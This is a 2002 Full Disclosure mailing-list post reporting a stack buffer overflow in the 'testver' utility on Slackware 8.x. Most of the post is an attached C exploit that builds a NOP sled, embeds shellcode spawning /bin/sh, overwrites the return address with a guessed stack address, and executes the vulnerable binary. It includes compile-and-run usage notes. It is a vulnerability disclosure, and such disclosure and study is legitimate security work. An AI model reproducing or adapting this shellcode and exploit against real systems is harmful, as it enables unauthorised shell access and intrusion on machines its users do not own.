Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

buffer overflow in "testver" on Slackware NOT SETUID ROOT

From: Day Jay <d4yj4y () yahoo com>
Date: Wed, 20 Nov 2002 22:18:02 -0800 (PST)
Chung's Donut Shop Release
==========================
www.vapid.org/dorian/chungs
For Linux Slackware 8.x

There's a buffer overflow in "testver" on Slackware
8.x. If you pass an argument to testver longer than
4074 bytes it segfaults. Oops. That's plenty of room
to insert shellcode. testver is NOT setuid root. If it
was, the attached proof of concept code would give you
a root shell. Since it's not, the attached code gives
you a normal shell.
              
This issue was found by d4y-j4y and the attatched
proof of lamerness was written by d4y-j4y.
d4yj4y () yahoo com

Regards,
d4y-j4y
         
     


__________________________________________________
Do you Yahoo!?
Yahoo! Mail Plus – Powerful. Affordable. Sign up now.
http://mailplus.yahoo.com
/*
         Chung's Donut Shop Release
         ==========================
         www.vapid.org/dorian/chungs
         For Linux Slackware 8.x
         There's a buffer overflow in "testver"!! 
         If you pass an argument to testver longer than 4074 bytes
         It segfaults. Oops. That's plenty of room to insert shellcode.
              
         This issue was found by d4y-j4y and this exploit was written
         by d4y-j4y. d4yj4y () yahoo com
         
         usage:
         $ gcc testver_smash.c -o testver_smash
         $ ./testver_smash
         $
         Not setuid though!!!  ARgh!!
                
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define BUFFER                         4075 
#define OVERSIZE                       8 

// Ya, you know the shellcode that gives you a shell
char shellcode[] =
   "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
   "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
   "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
   "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp (void)
{
         __asm__("movl %esp, %eax");
}

int main ()
{
         char buffer [BUFFER+OVERSIZE+1];
         unsigned long sp;
         long addy;
         int offset = 8 ;
         int i;
         sp = get_sp ();
         offset = 300;
         addy = sp - offset;

         for( i=BUFFER; i< BUFFER+OVERSIZE; i+=4)
             *(long*)&buffer[i] = addy;

         memset (buffer, 0x90, BUFFER-strlen(shellcode));
         memcpy (buffer + BUFFER - strlen (shellcode), shellcode,strlen(shellcode));
         buffer[BUFFER+OVERSIZE] = '\0';
         printf ("Chung\'s Donut Shop\ntestver smash by d4y-j4y...\n");
         sleep(3);
         execl ("/usr/sbin/testver", "buffer", buffer, NULL);

         return 0;
}
Previous By Date Next
Previous By Thread Next

Current thread: